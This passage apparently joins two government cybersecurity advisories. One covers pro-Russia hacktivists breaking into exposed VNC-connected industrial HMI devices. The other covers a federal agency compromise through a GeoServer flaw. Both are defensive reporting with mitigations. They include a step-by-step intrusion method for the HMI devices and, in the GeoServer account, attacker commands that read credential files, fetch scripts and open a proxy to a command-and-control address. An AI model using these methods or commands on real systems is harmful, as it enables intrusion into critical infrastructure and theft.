through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives. Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability. Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. TTP Overview Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure. Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems. Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the Water and Wastewater, Food and Agriculture, and Energy Sectors. Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions: Scan for vulnerable devices on the internet [T0883] with open VNC ports [T1595.002]. Initiate temporary virtual private server (VPS) [T1583.003] to execute password brute force software. Use VNC software to access hosts [T1021.005]. Confirm connection to the vulnerable device [T0886]. Brute force the password, if required [T1110.003]. Gain access to HMI devices [T0883], typically with default [T0812], weak, or no passwords [T0859]. Log the confirmed vulnerable device IP address, port, and password. Using the HMI graphical interface [T0823], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [T0828]: Modify usernames/passwords [T0892]; Modify parameters [T0836]; Modify device name [T0892]; Modify instrument settings [T0831]; Disable alarms [T0878]; Create loss of view (a technique that mandates local hands-on operator intervention) [T0829]; and/or Device restart or shutdown [T0816]. Disconnect from the device, ending the VNC connection. Research the compromised device company after the intrusion [T1591]. Propagation To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations. Reconnaissance and Initial Access The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as Nmap or OPENVAS, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port 5900 or other nearby ports (5901-5910). Their goal is to gain remote access to HMI devices connected to live control networks. Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media. Impact While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety. Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation. MITRE ATT&CK Tactics and Techniques See Table 1 to Table 10 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 1. Reconnaissance Technique Title ID Use Gather Victim Organization Information T1591 Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims. Active Scanning: Vulnerability Scanning T1595.002 Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports. Table 2. Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 Threat actors use virtual infrastructure to obfuscate identifiers. Table 3. Initial Access Technique Title ID Use Internet Accessible Device T0883 Threat actors gain access through less secure HMI devices exposed to the internet. Table 4. Persistence Technique Title ID Use Valid Accounts T0859 Threat actors use password guessing tools to access legitimate accounts on the HMI devices. Table 5. Credential Access Technique Title ID Use Brute Force: Password Spraying T1110.003 Threat actors use tools to rapidly guess common or simple passwords. Table 6. Lateral Movement Technique Title ID Use Default Credentials T0812 Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts. Remote Services T0886 Threat actors leverage VNC services to access system HMI devices. Remote Services: VNC T1021.005 Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software. Table 7. Execution Technique Title ID Use Graphical User Interface T0823 Threat actors interact with HMI devices via GUIs, attempting to modify control devices. Table 8. Inhibit Response Function Technique Title ID Use Device Restart/Shutdown T0816 While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response. Alarm Suppression T0878 Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion. Change Credential T0892 Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations. Table 9. Impair Process Control Technique Title ID Use Modify Parameter T0836 Threat actors attempt to change upper and lower limits of operational devices as available from the HMI. Unauthorized Command Message T0855 Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact. Table 10. Impact Technique Title ID Use Loss of Productivity and Revenue T0828 Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities. Loss of View T0829 Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely. Manipulation of Control T0831 Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes. Incident Response If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols: Determine which hosts were compromised and isolate them by quarantining or taking them offline. Initiate threat hunting activities to scope the intrusion. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections. Reimage compromised hosts. Provision new account credentials. Report the compromise to CISA, FBI, and/or NSA. See the Contact Information section of this advisory. Harden the network to prevent additional malicious activity. See the Mitigations section of this advisory for guidance. Mitigations OT Asset Owners and Operators The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Reduce exposure of OT assets to the public-facing internet. When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [CPG 3.S]. Asset owners should use attack surface management services and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties. Note: For more information on attack surface management, see CISA’s Internet Exposure Reduction Guidance, CISA’s Cyber Hygiene Services for U.S. critical infrastructure, and NSA’s Attack Surface Management for the U.S. Defense Industrial Base. Implement network segmentation between IT and OT networks. Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [CPG 3.I]. Consider implementing a firewall and/or virtual private network if exposure to the internet is necessary for controlling access to devices. Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed. Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements. Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks. Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage. Adopt mature asset management processes, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [CPG 2.A]. Keep remote access services updated with the latest version available and ensure all systems and software are up to date with patches and necessary security updates. Keep VNC systems updated with the latest version available. Refer to the joint Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected. Ensure OT assets use robust authentication procedures. Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques. Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [CPG 3.A] [CPG 3.B] [CPG 3.C] [CPG 3.F]. Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [CPG 3.E]. Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [CPG 3.R]. Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems. Enable control system security features that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [CPG 3.G]. Implement and practice business recovery/disaster recovery plans. Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation. Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [CPG 6.A]. Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [CPG 3.O]. Collect and monitor the traffic of OT assets and networking devices. This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs. Review configurations for setpoint ranges or tag values to stay within safe ranges and establish alerting for deviations. Take a proactive approach in the procurement process by following the guidance outlined in the joint guide Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products. OT Device Manufacturers Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. Eliminate default credentials and require strong passwords. The use of default credentials is a top weakness threat actors exploit to gain access to systems. Mandate MFA for privileged users. Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost. Practice secure by default principles. OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions. Include logging at no additional charge. Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats. Publish Software Bill of Materials (SBOMs). Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s SBOM webpage for more information. Additionally, see CISA’s Secure by Design Alert on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA’s Secure by Design webpage. Validate Security Controls In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&CK techniques described in this advisory. To start: Select an ATT&CK technique described in this advisory (see Table 1 to Table 10). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include: CISA, EPA, NSA, FBI, ASD’s ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ’s Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected. CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK’s guidance on Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity that can help organizations protect OT systems from pro-Russia hacktivist activity. NSA and CISA’s guidance on Control System Defense: Know the Opponent helps organizations defend OT and ICS assets against malicious cyber activity. CISA and EPA’s resource page on Water and Wastewater Cybersecurity to help organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems. For additional guidance, see CISA, EPA, and FBI’s fact sheet on Top Cyber Actions for Securing Water Systems. The Food and Ag-ISAC’s best practices on Food and Ag Cybersecurity: A Guide for Small & Medium Enterprises provides recommendations to help mitigate against cyber threats. DOE and National Association of Regulatory Utility Commissioners Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER) webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators to help mitigate cybersecurity risks. Additional resources that apply to this advisory include: EPA’s Cybersecurity for the Water Sector resource page provides organizations with guidance on implementing basic cyber hygiene practices. CISA’s Cross-Sector Cybersecurity Performance Goals enables critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques. CISA’s Require Strong Passwords webpage supports small and medium-sized businesses mitigating against malicious cyber activity that targets weak passwords. CISA, NSA, FBI, EPA, TSA, and international partners’ guidance Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products. DOE’s guidance on Cyber-Informed Engineering recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems. CISA’s Cyber Hygiene Services help enable critical infrastructure organizations to reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors. CISA, NSA, FBI, and international partners’ guidance on Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software urges software manufacturers to provide customers with products that are safer and more secure. See more information in these Secure by Design Alerts: How Manufacturers Can Protect Customers by Eliminating Default Passwords and How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity. Contact Information U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA: Contact CISA via CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov. Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: Report incidents by emailing Cyber Centre at contact@cyber.gc.ca. New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: Report a significant cyber security incident: report.ncsc.gov.uk (monitored 24 hours) or, for urgent assistance, call 03000 200 973. Disclaimer The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers. Acknowledgements Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory. Version History December 09, 2025: Initial version. Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups For further information on targeting methodologies for pro-Russia hacktivist groups, see: CISA’s alert Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology; The joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology; and CISA’s Russia Cyber Threat webpage. Appendix B: Additional Designators Used for Cited Groups The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory. Note: Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings. GRU military unit 74455 Sandworm Team Voodoo Bear Seashell Blizzard APT44 Cyber Army of Russia Reborn (CARR) CyberArmy of Russia Народная CyberАрмия (НКА) People’s CyberArmy of Russia (PCA) Russian CyberArmy Team (RCAT) NoName057(16) NoName057(16) Spain NoName057(16) Italy NoName057(16) France Z-Pentest Z-Pentest Beograd Z-Pentest Alliance Z-Alliance

Advisory at a Glance Executive Summary CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed. Key Actions Prevent compromise by prioritizing the patching of critical vulnerabilities in public-facing systems and known exploited vulnerabilities. Prepare for incidents by maintaining, practicing, and updating incident response plans. Prepare for incidents by implementing comprehensive and verbose logging and aggregate logs in a centralized out-of-band location. Indicators of Compromise For a downloadable copy of indicators of compromise, see: AA25-266A-JSON.stix_.json AA25-266A-STIX.stix_.xml Intended Audience Organizations: FCEB agencies and critical infrastructure organizations. Roles: Defensive Cybersecurity Analysts, Vulnerability Analysts, Security Systems Managers, Systems Security Analysts, and Cybersecurity Policy and Planning Professionals. Download the PDF version of this report AA25-266A advisory cisa shares lessons learned from ir engagement Introduction The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits. CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers. Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details): Vulnerabilities were not promptly remediated. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers. The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer. The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources. This delayed certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools. EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection. These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture. This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see: AA25-266A-JSON.stix_.json AA25-266A-STIX.stix_.xml Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. Threat Actor Activity CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts. During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401 [CWE-95: “Eval Injection”] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions [1]. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on July 15, 2024.) After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques. See Figure 1 for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs. Figure 1. Overview of Threat Actor Activity Reconnaissance The cyber threat actors identified CVE-2024-36401 in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access. Resource Development The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003]. Initial Access To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL. Persistence The cyber threat actors primarily used web shells [T1505.003] on internet-facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use. Privilege Escalation The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: “Race Condition”] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges). Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022. Defense Evasion To evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use. Note: CISA could not recover most of the files on the host to confirm their contents. Credential Access Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services. Discovery After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization’s network. CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk. GeoServer 1 The cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1: uname-a df-h env ps -aux ipconfig [T1016] date who -b rpm -qa polkit netstat -ano [T1049] Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1: cat /etc/passwd [T1087.001] cat /etc/resolv.conf cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml cat /etc/redhat-release [T1082] cat /etc/os-release The cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory. Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally. The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively. SQL Server CISA observed the following discovery commands on the organization’s SQL server: whoami [T1033] ipconfig /all ping -n 1 8.8.8.8 systeminfo tasklist [T1057] dir c:\ [T1083] dir c:\Users type c:\Last.txt type c:\inetpub\wwwroot type c:\inetpub\ dir c:\inetpub\wwwroot dir c:\ dir c:\ifwapps dir d:\ dir e:\ net group "domain admins" /domain type C:\Windows\System32\inetsrv\config\applicationHost.config dir c:\ifwapps\Tier1Utilities netstat -ano curl net user tasklist GeoServer 2 Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands. Lateral Movement In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1. Command and Control The cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105]. They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account. The actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10. To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441. On July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel. CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts: RingQ antivirus defense evasion tool (RingQ.exe, RingQ.rar) IOX proxy tool (iox.rar) BusyBox trojan multi-tool (busybox) WinRAR archive tool (Rar.exe) Stowaway proxy tool (agent, agent.tar, agent.zip, agentu.exe) Web shells (Handx.ashx, start_tomcat.jsp) Various shell scripts (mm.sh, t.py, t1.sh, c.bat) Detection The cyber threat actors remained undetected in the organization’s environment for three weeks before the organization’s SOC identified the compromise using their EDR tool. On July 31, 2024, their EDR tool identified a 1.txt file uploaded as suspected malware on the SQL Server. The SOC responded to additional alerts when the cyber threat actors transferred 1.txt to the SQL Server through bitsadmin after attempting other LOTL techniques, such as leveraging PowerShell and certutil. The alerts generated by this activity on the SQL server prompted the SOC to contain the server, initiate an investigation, request assistance from CISA, and uncover malicious activity on GeoServer 1. Lessons Learned CISA is sharing the following lessons learned based on what CISA learned about the organization’s security posture through incident detection and response activities. Vulnerabilities were not promptly remediated. The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers. The vulnerability was disclosed June 30, 2024, and the cyber threat actors exploited it for initial access to GeoServer 1 on July 11, 2024. The vulnerability was added to CISA’s KEV Catalog on July 15, 2024, and by July 24, 2024, the vulnerability was not patched when the cyber threat actors exploited it for access to GeoServer 2. Note: FCEB agencies are required to remediate vulnerabilities in CISA’s KEV Catalog within prescribed timeframes under Binding Operational Directive (BOD) 22-01. July 24, 2024, was within the KEV-required patching window for this CVE. However, CISA encourages FCEB agencies and critical infrastructure organizations to address KEV catalog vulnerabilities immediately as part of their vulnerability management plan. The agency did not test or exercise their IRP, nor did their IRP enable them to promptly engage third parties and grant third parties’ access to necessary resources. On Aug. 1, 2024, upon discovering the endpoint alerts, the agency conducted remote triage of affected systems and used their EDR tool to contain the intrusion. After containment, the agency engaged CISA to investigate potential threat actor persistence in their environment. Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA’s efforts to respond to the incident quickly and efficiently. The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA’s analysis. The agency had to go through their change control board process before CISA could deploy their EDR agents. The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period. EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection. The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an 